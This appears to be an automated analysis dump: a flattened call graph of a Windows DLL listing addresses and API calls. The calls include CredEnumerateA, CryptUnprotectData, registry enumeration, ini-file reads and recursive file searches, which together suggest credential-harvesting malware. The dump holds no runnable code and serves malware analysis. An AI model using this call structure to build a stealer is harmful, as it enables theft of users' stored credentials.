10001e6a 7 API calls 7790 10009f32 7789->7790 7791 10009f54 7790->7791 7792 1000419e 34 API calls 7790->7792 7791->7430 7793 10009f4f 7792->7793 7794 10001871 LocalFree 7793->7794 7794->7791 7796 1000485f 7795->7796 9008 10001888 LocalAlloc 7796->9008 7798 10004881 GetWindowsDirectoryA 7799 10004895 7798->7799 7800 100048a9 7798->7800 7799->7800 7801 1000489c 7799->7801 7802 10001871 LocalFree 7800->7802 9009 1000471a 7801->9009 7804 100048a7 7802->7804 7805 10001e6a 7 API calls 7804->7805 7806 100048b8 7805->7806 7807 1000471a 28 API calls 7806->7807 7808 100048c1 7807->7808 7809 10001e6a 7 API calls 7808->7809 7810 100048c8 7809->7810 7811 100048e0 7810->7811 7812 10001e05 6 API calls 7810->7812 7813 10001e6a 7 API calls 7811->7813 7814 100048d7 7812->7814 7815 100048e7 7813->7815 7816 1000471a 28 API calls 7814->7816 7817 100048ff 7815->7817 7818 10001e05 6 API calls 7815->7818 7816->7811 7819 10001e6a 7 API calls 7817->7819 7820 100048f6 7818->7820 7821 10004906 7819->7821 7822 1000471a 28 API calls 7820->7822 7823 1000491e 7821->7823 7824 10001e05 6 API calls 7821->7824 7822->7817 7825 10001d2a 6 API calls 7823->7825 7826 10004915 7824->7826 7827 10004935 7825->7827 7828 1000471a 28 API calls 7826->7828 7829 1000471a 28 API calls 7827->7829 7828->7823 7830 1000493e 7829->7830 7831 10001d2a 6 API calls 7830->7831 7832 10004955 7831->7832 7833 1000496f 7832->7833 9061 10004703 7832->9061 7835 10001d2a 6 API calls 7833->7835 7836 10004986 7835->7836 7838 1000471a 28 API calls 7836->7838 7840 1000498f 7838->7840 7839 10001871 LocalFree 7839->7833 7841 10001d2a 6 API calls 7840->7841 7842 100049a6 7841->7842 7843 100049c0 7842->7843 7844 10004703 16 API calls 7842->7844 7845 10001d2a 6 API calls 7843->7845 7846 100049b8 7844->7846 7847 100049d6 7845->7847 7848 10001871 LocalFree 7846->7848 7849 1000471a 28 API calls 7847->7849 7848->7843 7850 100049df 7849->7850 7851 10001d2a 6 API calls 7850->7851 7852 100049f5 7851->7852 7853 10004a0f 7852->7853 7854 10004703 16 API calls 7852->7854 7855 10001d2a 6 API calls 7853->7855 7856 10004a07 7854->7856 7868 1000521d 7867->7868 9064 100050e6 7868->9064 7871 100050e6 24 API calls 7872 1000526c 7871->7872 7873 100050e6 24 API calls 7872->7873 7874 10005284 7873->7874 7875 100050e6 24 API calls 7874->7875 7876 1000529c 7875->7876 7877 100050e6 24 API calls 7876->7877 7878 100052b4 7877->7878 7879 100050e6 24 API calls 7878->7879 7880 100052cc 7879->7880 7881 100050e6 24 API calls 7880->7881 7882 100052e4 7881->7882 7883 100050e6 24 API calls 7882->7883 7884 100052fc 7883->7884 7885 100050e6 24 API calls 7884->7885 7886 10005313 7885->7886 7887 100050e6 24 API calls 7886->7887 7888 1000532a 7887->7888 7889 100050e6 24 API calls 7888->7889 7890 10005341 7889->7890 7891 100050e6 24 API calls 7890->7891 7892 10005358 7891->7892 7893 100050e6 24 API calls 7892->7893 7894 1000536f 7893->7894 7895 100050e6 24 API calls 7894->7895 7896 10005386 7895->7896 7897 100050e6 24 API calls 7896->7897 7898 1000539d 7897->7898 7899 100050e6 24 API calls 7898->7899 7900 100053b4 7899->7900 9081 100051ab 7900->9081 7903 100051ab 29 API calls 7908 10005717 7907->7908 9111 100055de 7908->9111 7911 10001d2a 6 API calls 7912 1000573e 7911->7912 7913 10005751 7912->7913 9136 100053e1 7912->9136 7915 10001d2a 6 API calls 7913->7915 7917 10005768 7915->7917 7919 1000577b 7917->7919 7920 100053e1 20 API calls 7917->7920 7918 10001871 LocalFree 7918->7913 7921 10001d2a 6 API calls 7919->7921 7922 10005776 7920->7922 7923 10005791 7921->7923 7942 10008354 7941->7942 7946 1000837a 7942->7946 7948 10007b11 CoTaskMemFree 7942->7948 9191 10007fe8 CoCreateInstance 7946->9191 7948->7946 7950 100083b7 7950->7430 7952 10005c93 7951->7952 9253 10005a20 RegOpenKeyA 7952->9253 7954 10005ca3 7954->7430 7956 10002eeb 7955->7956 7957 10002ead GetProcAddress 7955->7957 7956->7465 7957->7956 7958 10002ebc GetProcAddress 7957->7958 7958->7956 7959 10002ecd GetCurrentProcess 7958->7959 7960 10002edb 7959->7960 7960->7465 7960->7956 7961->7467 7963 10001566 7962->7963 7963->7469 7965 10002f16 7964->7965 7966 10002f04 7964->7966 7965->7472 7966->7965 7967 10002f1d AllocateAndInitializeSid 7966->7967 7968 10002f60 CheckTokenMembership 7967->7968 7969 10002f5e 7967->7969 7970 10002f81 FreeSid 7968->7970 7971 10002f7a 7968->7971 7969->7472 7970->7472 7971->7970 7973 100027d0 18 API calls 7972->7973 7975 10004476 7973->7975 7974 10004481 CoCreateGuid 7976 100044ec 7974->7976 7977 1000448e wsprintfA lstrlenA 7974->7977 7975->7974 7975->7976 7979 10001871 LocalFree 7976->7979 7978 100026b6 19 API calls 7977->7978 7978->7976 7980 100044f1 7979->7980 7981 100027d0 7980->7981 8002 10001d2a 7981->8002 7984 100027f8 GetTempPathA 7985 10002813 7984->7985 7995 100028c8 7984->7995 7986 10002853 7985->7986 7987 10002837 7985->7987 7985->7995 7988 10001db1 5 API calls 7986->7988 7989 10001db1 5 API calls 7987->7989 7992 10002851 7988->7992 7990 10002848 7989->7990 7991 10001e05 6 API calls 7990->7991 7991->7992 7993 100028c3 7992->7993 7996 10002881 GetHGlobalFromStream 7992->7996 7994 10001871 LocalFree 7993->7994 7994->7995 7995->7478 7996->7993 7997 10002891 GlobalLock 7996->7997 7997->7993 7998 1000289d 7997->7998 8006 10001888 LocalAlloc 7998->8006 8000 100028a6 8001 100028b3 GlobalUnlock 8000->8001 8001->7993 8003 10001d36 8002->8003 8007 10001c46 8003->8007 8006->8000 8009 10001c54 RegOpenKeyExA 8007->8009 8010 10001d03 8009->8010 8011 10001c94 RegQueryValueExA 8009->8011 8012 10001d25 8010->8012 8015 10001c46 2 API calls 8010->8015 8013 10001cfb RegCloseKey 8011->8013 8014 10001caf 8011->8014 8012->7984 8012->7995 8013->8010 8014->8013 8021 10001888 LocalAlloc 8014->8021 8015->8012 8017 10001ccb RegQueryValueExA 8018 10001ce5 8017->8018 8019 10001ceb 8017->8019 8020 10001871 LocalFree 8018->8020 8019->8013 8020->8019 8021->8017 8032 10004363 8022->8032 8025 10004363 39 API calls 8026 100043bd 8025->8026 8027 10004363 39 API calls 8026->8027 8028 100043d0 8027->8028 8028->7490 8051 1000419e 8029->8051 8041 10001e6a 8032->8041 8034 10004390 8034->8025 8036 10001e05 6 API calls 8037 1000437b 8036->8037 8038 10004349 34 API calls 8037->8038 8039 1000438b 8038->8039 8040 10001871 LocalFree 8039->8040 8040->8034 8050 10001888 LocalAlloc 8041->8050 8043 10001e7b 8044 10001e87 8043->8044 8045 10001e89 SHGetFolderPathA 8043->8045 8046 10001871 LocalFree 8044->8046 8045->8044 8049 10001eda 8045->8049 8047 10001ea7 8046->8047 8048 10001d2a 6 API calls 8047->8048 8047->8049 8048->8047 8049->8034 8049->8036 8050->8043 8052 100041bd 8051->8052 8054 100041b8 8051->8054 8053 10001871 LocalFree 8052->8053 8055 10004345 8053->8055 8054->8052 8056 100041dd 8054->8056 8057 100041ce 8054->8057 8055->7497 8059 10001db1 5 API calls 8056->8059 8058 10001db1 5 API calls 8057->8058 8060 100041db 8058->8060 8059->8060 8061 10004201 FindFirstFileA 8060->8061 8061->8052 8070 10004220 8061->8070 8062 10004232 lstrcmpiA 8063 10004249 lstrcmpiA 8062->8063 8062->8070 8063->8070 8064 100042c6 StrStrIA 8065 10004315 FindNextFileA 8064->8065 8064->8070 8066 1000432f FindClose 8065->8066 8065->8070 8066->8052 8067 10001db1 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 8067->8070 8068 10001e05 6 API calls 8068->8070 8070->8062 8070->8064 8070->8065 8070->8067 8070->8068 8071 1000419e 28 API calls 8070->8071 8072 10001871 LocalFree 8070->8072 8073 10001871 LocalFree 8070->8073 8075 100093e5 8070->8075 8079 10004064 8070->8079 8071->8070 8072->8065 8073->8070 8076 100093f4 8075->8076 8077 10009416 8076->8077 8093 10008e8b 8076->8093 8077->8070 8248 10001f73 ExpandEnvironmentStringsA 8079->8248 8082 100040d1 8082->8070 8084 10004083 8085 10004087 8084->8085 8086 100040c9 8084->8086 8261 10001fb7 8085->8261 8087 10001871 LocalFree 8086->8087 8087->8082 8090 100040ab 8273 1000204c 8090->8273 8095 10008e99 8093->8095 8094 10008eab 8094->8077 8095->8094 8098 10008a44 8095->8098 8097 10009024 8097->8077 8099 10008a51 8098->8099 8101 10008a5b 8098->8101 8099->8097 8100 10008adc 8100->8097 8101->8100 8139 10001888 LocalAlloc 8101->8139 8103 10008b14 8104 10008b49 8103->8104 8105 10008b3a 8103->8105 8118 10008b53 8104->8118 8136 10008bfc 8104->8136 8106 10001871 LocalFree 8105->8106 8108 10008b42 8106->8108 8107 10008bf7 8110 10001871 LocalFree 8107->8110 8108->8097 8109 10008bcd 8112 10008a44 6 API calls 8109->8112 8111 10008d45 8110->8111 8111->8097 8113 10008be4 8112->8113 8113->8107 8114 10008be8 8113->8114 8115 10001871 LocalFree 8114->8115 8117 10008c36 8120 10001871 LocalFree 8117->8120 8118->8109 8119 10008b8e 8118->8119 8122 10008a44 6 API calls 8118->8122 8126 10008bb8 8118->8126 8121 10001871 LocalFree 8119->8121 8123 10008c3e 8120->8123 8124 10008b96 8121->8124 8122->8118 8123->8097 8124->8097 8125 10008c66 8127 10001871 LocalFree 8125->8127 8128 10001871 LocalFree 8126->8128 8129 10008c6e 8127->8129 8130 10008bc0 8128->8130 8129->8097 8130->8097 8132 10008ce0 8133 10001871 LocalFree 8132->8133 8135 10008ce8 8133->8135 8135->8097 8136->8107 8136->8117 8136->8125 8136->8132 8140 10008472 8136->8140 8147 1000889a 8136->8147 8174 100092b6 8136->8174 8184 10008830 8136->8184 8139->8103 8141 10008482 8140->8141 8142 10008488 8140->8142 8141->8136 8191 10001888 LocalAlloc 8142->8191 8144 10001871 LocalFree 8145 1000857e 8144->8145 8145->8136 8146 10008493 8146->8144 8148 100088ba 8147->8148 8149 100088c2 8147->8149 8148->8136 8150 100088ce 8149->8150 8192 10001888 LocalAlloc 8149->8192 8150->8136 8152 1000897f 8153 10008932 8153->8152 8160 1000895c 8153->8160 8161 10001871 LocalFree 8160->8161 8175 100093e1 8174->8175 8176 100092c6 8174->8176 8175->8136 8176->8175 8177 100092e6 lstrcmpiA 8176->8177 8177->8175 8178 10009301 8177->8178 8178->8175 8179 10009321 lstrcmpA 8178->8179 8179->8175 8185 1000883a 8184->8185 8186 1000883f 8184->8186 8185->8136 8187 10008853 8186->8187 8188 10001871 LocalFree 8186->8188 8189 10001871 LocalFree 8187->8189 8188->8186 8190 1000885b 8189->8190 8190->8136 8191->8146 8192->8153 8249 10001fac 8248->8249 8250 10001f89 8248->8250 8249->8082 8255 10001eef 8249->8255 8276 10001888 LocalAlloc 8250->8276 8252 10001f90 ExpandEnvironmentStringsA 8252->8249 8253 10001fa4 8252->8253 8254 10001871 LocalFree 8253->8254 8254->8249 8256 10001efa 8255->8256 8257 10001eff 8255->8257 8256->8257 8258 10001f09 CreateFileA 8256->8258 8257->8084 8259 10001f33 8258->8259 8260 10001f27 CloseHandle 8258->8260 8259->8084 8260->8259 8277 1000189f 8261->8277 8264 10001fe2 GetFileSize CreateFileMappingA 8266 10002032 CloseHandle 8264->8266 8267 10002003 MapViewOfFile 8264->8267 8265 10002030 8265->8086 8265->8090 8269 10002363 8265->8269 8266->8265 8267->8265 8268 1000201b CloseHandle CloseHandle 8267->8268 8268->8265 8270 10002377 8269->8270 8271 100023bd 8270->8271 8279 1000233f 8270->8279 8271->8090 8274 10002058 UnmapViewOfFile CloseHandle CloseHandle 8273->8274 8275 1000206f 8273->8275 8274->8275 8275->8086 8276->8252 8278 100018ac CreateFileA 8277->8278 8278->8264 8278->8265 8282 10001888 LocalAlloc 8279->8282 8284 100015b4 8283->8284 8284->7500 8286 100076a5 8285->8286 8287 100076fc 8285->8287 8288 10001d2a 6 API calls 8286->8288 8365 10001888 LocalAlloc 8287->8365 8290 100076b7 8288->8290 8290->8287 8316 100023e6 8290->8316 8291 10007706 RegOpenKeyA 8292 1000778c 8291->8292 8293 1000771c 8291->8293 8295 10001871 LocalFree 8292->8295 8296 10007723 RegEnumKeyExA 8293->8296 8302 10001db1 5 API calls 8293->8302 8306 10001e05 6 API calls 8293->8306 8309 10007690 81 API calls 8293->8309 8313 10001871 LocalFree 8293->8313 8298 10007794 8295->8298 8296->8293 8299 10007748 RegCloseKey 8296->8299 8298->7503 8299->8292 8300 100076f7 8303 10001871 LocalFree 8300->8303 8302->8293 8303->8287 8304 10001e6a 7 API calls 8305 100076d0 8304->8305 8307 100076ef 8305->8307 8308 10001e05 6 API calls 8305->8308 8306->8293 8310 10001871 LocalFree 8307->8310 8311 100076dd 8308->8311 8309->8293 8310->8300 8326 10007515 8311->8326 8313->8293 8314 100076ea 8315 10001871 LocalFree 8314->8315 8315->8307 8317 10001db1 5 API calls 8316->8317 8318 100023f5 lstrlenA 8317->8318 8319 10002413 StrStrIA 8318->8319 8320 10002404 8318->8320 8321 10002422 8319->8321 8322 10002426 StrRChrIA 8319->8322 8320->8319 8321->8322 8323 10002434 lstrlenA 8322->8323 8325 10002447 8323->8325 8325->8300 8325->8304 8366 10001f38 8326->8366 8328 10007524 8329 10007528 8328->8329 8330 10001f38 GetFileAttributesA 8328->8330 8329->8314 8332 10007535 8330->8332 8331 10007539 8331->8314 8332->8331 8333 10007559 8332->8333 8334 1000754a 8332->8334 8336 10001db1 5 API calls 8333->8336 8335 10001db1 5 API calls 8334->8335 8337 10007557 8335->8337 8336->8337 8338 10001db1 5 API calls 8337->8338 8339 10007573 8338->8339 8371 10001888 LocalAlloc 8339->8371 8341 10007580 8372 10001888 LocalAlloc 8341->8372 8343 1000758d 8344 10001eef 2 API calls 8343->8344 8345 10007598 8344->8345 8346 100075a0 GetPrivateProfileSectionNamesA 8345->8346 8347 1000765d 8345->8347 8346->8347 8349 100075b9 8346->8349 8348 10001871 LocalFree 8347->8348 8351 10007665 8348->8351 8349->8347 8350 100075c5 StrStrIA 8349->8350 8357 10001db1 5 API calls 8349->8357 8362 100074fd 67 API calls 8349->8362 8364 10001871 LocalFree 8349->8364 8350->8349 8352 100075d4 GetPrivateProfileStringA 8350->8352 8353 10001871 LocalFree 8351->8353 8352->8349 8354 100075f3 GetPrivateProfileIntA 8352->8354 8355 1000766d 8353->8355 8354->8349 8356 10001871 LocalFree 8355->8356 8357->8349 8362->8349 8364->8349 8365->8291 8367 10001f42 8366->8367 8368 10001f47 8366->8368 8367->8368 8369 10001f50 GetFileAttributesA 8367->8369 8368->8328 8370 10001f5d 8369->8370 8370->8328 8371->8341 8372->8343 8552 1000945c 8549->8552 8565 10009426 8552->8565 8555 10009426 39 API calls 8556 10009489 8555->8556 8557 10009426 39 API calls 8556->8557 8558 1000949e 8557->8558 8559 10009426 39 API calls 8558->8559 8560 100094b3 8559->8560 8561 10009426 39 API calls 8560->8561 8562 100094c8 8561->8562 8563 10009426 39 API calls 8562->8563 8564 100094dd 8563->8564 8564->7513 8566 10001e6a 7 API calls 8565->8566 8567 10009431 8566->8567 8568 10009458 8567->8568 8569 10001e05 6 API calls 8567->8569 8568->8555 8570 1000943e 8569->8570 8571 1000419e 34 API calls 8570->8571 8572 10009453 8571->8572 8573 10001871 LocalFree 8572->8573 8573->8568 8574->7517 8575->7519 8576->7521 8580 10002a17 8577->8580 8579 10002a90 8579->7545 8581 10002a24 8580->8581 8582 10002a2b WideCharToMultiByte 8580->8582 8581->8579 8583 10002a48 8582->8583 8589 10002a7a 8582->8589 8590 10001888 LocalAlloc 8583->8590 8585 10002a53 8586 10002a57 WideCharToMultiByte 8585->8586 8585->8589 8587 10002a74 8586->8587 8586->8589 8588 10001871 LocalFree 8587->8588 8588->8589 8589->8579 8590->8585 8592 10001d2a 6 API calls 8591->8592 8593 1000a2c0 8592->8593 8594 1000a2df 8593->8594 8598 1000a259 8593->8598 8594->7557 8597 10001871 LocalFree 8597->8594 8605 1000a223 8598->8605 8601 1000a223 39 API calls 8602 1000a28a 8601->8602 8603 1000a223 39 API calls 8602->8603 8604 1000a2a1 8603->8604 8604->8597 8606 10001e6a 7 API calls 8605->8606 8607 1000a22e 8606->8607 8608 1000a255 8607->8608 8609 10001e05 6 API calls 8607->8609 8608->8601 8610 1000a23b 8609->8610 8611 1000419e 34 API calls 8610->8611 8612 1000a250 8611->8612 8613 10001871 LocalFree 8612->8613 8613->8608 8615 10001e6a 7 API calls 8614->8615 8616 10006a07 8615->8616 8617 10006a1a 8616->8617 8644 100068c0 8616->8644 8617->7577 8620 10001871 LocalFree 8620->8617 8622 1000675b 8621->8622 8625 10006756 8621->8625 8623 10001871 LocalFree 8622->8623 8624 100068bc 8623->8624 8624->7589 8625->8622 8626 1000677b 8625->8626 8627 1000676c 8625->8627 8629 10001db1 5 API calls 8626->8629 8628 10001db1 5 API calls 8627->8628 8630 10006779 8628->8630 8629->8630 8631 1000679f FindFirstFileA 8630->8631 8631->8622 8639 100067be 8631->8639 8632 10006849 StrStrIA 8635 1000688c FindNextFileA 8632->8635 8632->8639 8633 100067cc lstrcmpiA 8634 100067e3 lstrcmpiA 8633->8634 8633->8639 8634->8639 8636 100068a6 FindClose 8635->8636 8635->8639 8636->8622 8637 10001db1 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 8637->8639 8639->8632 8639->8633 8639->8635 8639->8637 8640 10001871 LocalFree 8639->8640 8641 10001e05 6 API calls 8639->8641 8642 1000673c 32 API calls 8639->8642 8643 10001871 LocalFree 8639->8643 8664 100066f7 8639->8664 8640->8635 8641->8639 8642->8639 8643->8639 8645 100068da 8644->8645 8646 100068df 8644->8646 8645->8646 8647 10001db1 5 API calls 8645->8647 8648 10001871 LocalFree 8646->8648 8649 100068f1 8647->8649 8650 100069f8 8648->8650 8651 10006908 FindFirstFileA 8649->8651 8650->8620 8651->8646 8656 10006927 8651->8656 8652 100069c8 FindNextFileA 8654 100069e2 FindClose 8652->8654 8652->8656 8653 10006939 lstrcmpiA 8655 10006953 lstrcmpiA 8653->8655 8653->8656 8654->8646 8655->8656 8656->8652 8656->8653 8657 10001db1 5 API calls 8656->8657 8658 10001e05 6 API calls 8656->8658 8657->8656 8659 10006995 StrStrIA 8658->8659 8660 100069b0 8659->8660 8661 100069c3 8659->8661 8662 1000673c 38 API calls 8660->8662 8663 10001871 LocalFree 8661->8663 8662->8661 8663->8652 8665 10004137 16 API calls 8664->8665 8666 10006705 8665->8666 8668 1000672c 8666->8668 8669 100064b3 8666->8669 8668->8639 8671 100064c2 8669->8671 8670 100064cb 8670->8668 8671->8670 8672 10006595 8671->8672 8684 10006343 8671->8684 8674 100065a7 8672->8674 8675 10006343 7 API calls 8672->8675 8674->8668 8683 100065c3 8675->8683 8676 100065c9 8676->8668 8677 10006201 LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 8677->8683 8678 10006667 StrStrIA 8679 10006678 StrStrIA 8678->8679 8678->8683 8681 10006689 StrStrIA 8679->8681 8679->8683 8680 10001871 LocalFree 8680->8683 8681->8683 8682 10001584 lstrlenA 8682->8683 8683->8676 8683->8677 8683->8678 8683->8680 8683->8682 8686 10006358 8684->8686 8685 10006372 8685->8672 8686->8685 8688 10006398 StrStrIA 8686->8688 8691 10001871 LocalFree 8686->8691 8692 10001584 lstrlenA 8686->8692 8693 10006282 8686->8693 8697 100062ff 8686->8697 8688->8686 8689 100063a9 StrStrIA 8688->8689 8689->8686 8691->8686 8692->8686 8695 1000628b 8693->8695 8705 10006201 8695->8705 8696 100062b7 8696->8686 8698 1000630f 8697->8698 8699 10006201 4 API calls 8698->8699 8700 1000631a 8699->8700 8701 10006201 4 API calls 8700->8701 8702 1000632a 8701->8702 8703 10006201 4 API calls 8702->8703 8704 1000633a 8703->8704 8704->8686 8706 10006216 8705->8706 8707 1000626f 8706->8707 8717 10005fe2 8706->8717 8707->8696 8710 10005fe2 2 API calls 8711 10006249 8710->8711 8723 1000606e 8711->8723 8713 1000625d 8714 10001871 LocalFree 8713->8714 8715 10006267 8714->8715 8716 10001871 LocalFree 8715->8716 8716->8707 8718 10005ff3 8717->8718 8720 10006034 8718->8720 8745 10001888 LocalAlloc 8718->8745 8720->8710 8721 10006015 8721->8720 8722 10001871 LocalFree 8721->8722 8722->8720 8724 1000608f 8723->8724 8725 1000607d 8723->8725 8724->8713 8725->8724 8746 10001888 LocalAlloc 8725->8746 8727 100060de 8747 10002452 8727->8747 8745->8721 8746->8727 8748 10001888 LocalAlloc 8747->8748 8755 10004aa3 8754->8755 8758 10004a9e 8754->8758 8756 10001871 LocalFree 8755->8756 8757 10004c0c 8756->8757 8757->7633 8758->8755 8759 10004ac3 8758->8759 8760 10004ab4 8758->8760 8762 10001db1 5 API calls 8759->8762 8761 10001db1 5 API calls 8760->8761 8763 10004ac1 8761->8763 8762->8763 8764 10004ae7 FindFirstFileA 8763->8764 8764->8755 8774 10004b06 8764->8774 8765 10004b14 lstrcmpiA 8768 10004b2b lstrcmpiA 8765->8768 8776 10004b26 8765->8776 8766 10004b79 StrStrIA 8767 10004bdc FindNextFileA 8766->8767 8766->8774 8770 10004bf6 FindClose 8767->8770 8767->8774 8768->8776 8769 10001db1 5 API calls 8769->8774 8770->8755 8771 10001db1 5 API calls 8771->8776 8772 10001e05 6 API calls 8772->8774 8773 10001e05 6 API calls 8773->8776 8774->8765 8774->8766 8774->8769 8774->8772 8775 10004bb7 StrStrIA 8774->8775 8778 10004bce 8774->8778 8775->8774 8776->8767 8776->8771 8776->8773 8777 10004a84 24 API calls 8776->8777 8781 10001871 LocalFree 8776->8781 8777->8776 8780 10001871 LocalFree 8778->8780 8793 10004a6d 8778->8793 8780->8767 8781->8776 8783 10001e6a 7 API calls 8782->8783 8784 10004c25 8783->8784 8785 10001db1 5 API calls 8784->8785 8791 10004c40 8784->8791 8787 10004c37 8785->8787 8786 10004a84 31 API calls 8788 10004c50 8786->8788 8789 10001871 LocalFree 8787->8789 8790 10001871 LocalFree 8788->8790 8789->8791 8792 10004c58 8790->8792 8791->8786 8792->7628 8794 10004064 16 API calls 8793->8794 8795 10004a80 8794->8795 8795->8778 8797 1000a656 8796->8797 8807 1000a36f 8796->8807 8797->7640 8798 1000a376 RegEnumKeyExA 8799 1000a39f RegCloseKey 8798->8799 8798->8807 8799->8797 8801 10001db1 5 API calls 8801->8807 8802 10001e05 6 API calls 8802->8807 8803 10001d2a 6 API calls 8803->8807 8804 1000a34f 15 API calls 8804->8807 8805 10001584 lstrlenA 8805->8807 8806 10001871 LocalFree 8806->8807 8807->8798 8807->8801 8807->8802 8807->8803 8807->8804 8807->8805 8807->8806 8809 10005f95 8808->8809 8818 10005d53 8808->8818 8809->7646 8810 10005d5a RegEnumKeyExA 8811 10005d83 RegCloseKey 8810->8811 8810->8818 8811->8809 8813 10001db1 LocalAlloc lstrlenA lstrlenA lstrcpyA lstrcatA 8813->8818 8814 10001d2a 6 API calls 8814->8818 8815 10001871 LocalFree 8815->8818 8816 10005d33 11 API calls 8816->8818 8817 10001584 lstrlenA 8817->8818 8818->8810 8818->8813 8818->8814 8818->8815 8818->8816 8818->8817 8820 1000acb0 8819->8820 8821 1000ac96 8819->8821 8823 1000a89e RegOpenKeyA 8820->8823 8821->8820 8843 10007b11 8821->8843 8824 1000a93e 8823->8824 8831 1000a8be 8823->8831 8824->7670 8825 1000a8c5 RegEnumKeyExA 8826 1000a8ee RegCloseKey 8825->8826 8825->8831 8826->8824 8828 10001db1 5 API calls 8828->8831 8829 10001e05 6 API calls 8829->8831 8831->8825 8831->8828 8831->8829 8832 10001871 LocalFree 8831->8832 8856 1000a709 8831->8856 8832->8831 8834 1000a9eb 8833->8834 8840 1000a962 8833->8840 8834->7674 8835 1000a969 RegEnumKeyExA 8836 1000a992 RegCloseKey 8835->8836 8835->8840 8836->8834 8838 10001db1 5 API calls 8838->8840 8839 10001e05 6 API calls 8839->8840 8840->8835 8840->8838 8840->8839 8841 1000a89e 23 API calls 8840->8841 8842 10001871 LocalFree 8840->8842 8841->8840 8842->8840 8846 10007b31 8843->8846 8844 10007b86 8844->8820 8846->8844 8847 10007a7b 8846->8847 8849 10007a9e 8847->8849 8848 10007afb 8848->8846 8849->8848 8851 100079f5 8849->8851 8852 10007a02 8851->8852 8853 10007a07 8851->8853 8852->8849 8854 10007a6b 8853->8854 8855 10007a5a CoTaskMemFree 8853->8855 8854->8849 8855->8853 8858 1000a719 8856->8858 8857 10001d2a 6 API calls 8857->8858 8858->8857 8860 1000a755 8858->8860 8861 10001871 LocalFree 8858->8861 8875 1000a6bf 8858->8875 8862 10001d2a 6 API calls 8860->8862 8863 10001584 lstrlenA 8860->8863 8865 10001871 LocalFree 8860->8865 8868 1000a7ac 8860->8868 8861->8858 8862->8860 8863->8860 8864 10001d2a 6 API calls 8864->8868 8865->8860 8866 10001871 LocalFree 8866->8868 8867 1000a6bf 6 API calls 8867->8868 8868->8864 8868->8866 8868->8867 8873 1000a82d 8868->8873 8884 100043d4 8868->8884 8869 10001d2a 6 API calls 8869->8873 8871 1000a884 8871->8831 8872 10001584 lstrlenA 8872->8873 8873->8869 8873->8871 8873->8872 8874 10001871 LocalFree 8873->8874 8874->8873 8890 10002a94 8875->8890 8877 1000a700 8877->8858 8878 1000a6d0 8878->8877 8879 10001584 lstrlenA 8878->8879 8880 1000a6ed 8879->8880 8881 10001584 lstrlenA 8880->8881 8882 1000a6f8 8881->8882 8883 10001871 LocalFree 8882->8883 8883->8877 8885 10004459 8884->8885 8886 100043fd 8884->8886 8885->8868 8886->8885 8887 1000441a CryptUnprotectData 8886->8887 8887->8885 8889 1000442a 8887->8889 8888 10004451 LocalFree 8888->8885 8889->8885 8889->8888 8891 10002aa3 8890->8891 8892 10002a9d 8890->8892 8891->8878 8892->8891 8893 10002aa9 IsTextUnicode 8892->8893 8894 10002aca 8893->8894 8895 10002aba 8893->8895 8899 10001888 LocalAlloc 8894->8899 8896 10002a17 4 API calls 8895->8896 8898 10002ac8 8896->8898 8898->8878 8899->8898 8901 10001e6a 7 API calls 8900->8901 8902 10005836 8901->8902 8903 10005854 8902->8903 8904 10001e05 6 API calls 8902->8904 8903->7728 8905 10005845 8904->8905 8906 100057fa 34 API calls 8905->8906 8907 1000584f 8906->8907 8908 10001871 LocalFree 8907->8908 8908->8903 8910 10004349 34 API calls 8909->8910 8911 10005812 8910->8911 8912 10004349 34 API calls 8911->8912 8913 10005827 8912->8913 8913->7715 8915 10001e6a 7 API calls 8914->8915 8916 10005981 8915->8916 8917 100059d3 8916->8917 8918 10001e05 6 API calls 8916->8918 8917->7744 8919 10005990 8918->8919 8920 10004349 34 API calls 8919->8920 8921 100059a6 8920->8921 8922 10004349 34 API calls 8921->8922 8923 100059ba 8922->8923 8924 10004349 34 API calls 8923->8924 8925 100059ce 8924->8925 8926 10001871 LocalFree 8925->8926 8926->8917 8928 10001e6a 7 API calls 8927->8928 8929 10004f39 8928->8929 8930 10004fd0 8929->8930 8931 10001db1 5 API calls 8929->8931 8930->7763 8932 10004f51 8931->8932 8933 10004df4 29 API calls 8932->8933 8934 10004f60 8933->8934 8935 10001871 LocalFree 8934->8935 8936 10004f65 8935->8936 8937 10001db1 5 API calls 8936->8937 8938 10004f72 8937->8938 8939 10004df4 29 API calls 8938->8939 8940 10004f81 8939->8940 8941 10001871 LocalFree 8940->8941 8942 10004f86 8941->8942 8943 10001db1 5 API calls 8942->8943 8944 10004f93 8943->8944 8945 10004df4 29 API calls 8944->8945 8946 10004fa2 8945->8946 8947 10001871 LocalFree 8946->8947 8948 10004fa7 8947->8948 8949 10001db1 5 API calls 8948->8949 8950 10004fb4 8949->8950 8951 10004df4 29 API calls 8950->8951 8952 10004fc3 8951->8952 8953 10001871 LocalFree 8952->8953 8954 10004fc8 8953->8954 8955 10001871 LocalFree 8954->8955 8955->8930 8957 10001d2a 6 API calls 8956->8957 8959 10004dce 8957->8959 8958 10004df0 8958->7773 8959->8958 8960 10001871 LocalFree 8959->8960 8960->8958 8962 10004e13 8961->8962 8963 10004e0e 8961->8963 8965 10001871 LocalFree 8962->8965 8963->8962 8964 10001db1 5 API calls 8963->8964 8966 10004e23 8964->8966 8967 10004f27 8965->8967 8985 10004d93 8966->8985 8967->7759 8970 10001871 LocalFree 8971 10004e32 8970->8971 8972 10001db1 5 API calls 8971->8972 8973 10004e3f 8972->8973 8974 10004e56 FindFirstFileA 8973->8974 8974->8962 8975 10004e75 8974->8975 8976 10004e83 lstrcmpiA 8975->8976 8977 10004ef7 FindNextFileA 8975->8977 8979 10004e9d lstrcmpiA 8976->8979 8983 10004e9b 8976->8983 8977->8975 8978 10004f11 FindClose 8977->8978 8978->8962 8979->8983 8980 10001db1 5 API calls 8980->8983 8981 10001e05 6 API calls 8981->8983 8982 10004d93 16 API calls 8982->8983 8983->8977 8983->8980 8983->8981 8983->8982 8984 10001871 LocalFree 8983->8984 8984->8977 8986 10004064 16 API calls 8985->8986 8987 10004da6 8986->8987 8987->8970 8989 10009cd9 8988->8989 8990 10009c5d 8988->8990 8989->7789 8990->8989 8991 10009c6f CredEnumerateA 8990->8991 8991->8989 8992 10009c96 8991->8992 8992->8989 8993 10009cd0 CredFree 8992->8993 8995 10009b9c 8992->8995 8993->8989 8996 10009baf 8995->8996 8997 10001584 lstrlenA 8996->8997 8998 10009bba 8997->8998 8999 10001584 lstrlenA 8998->8999 9000 10009bc5 8999->9000 9001 10009bd3 StrStrIA 9000->9001 9002 10009be4 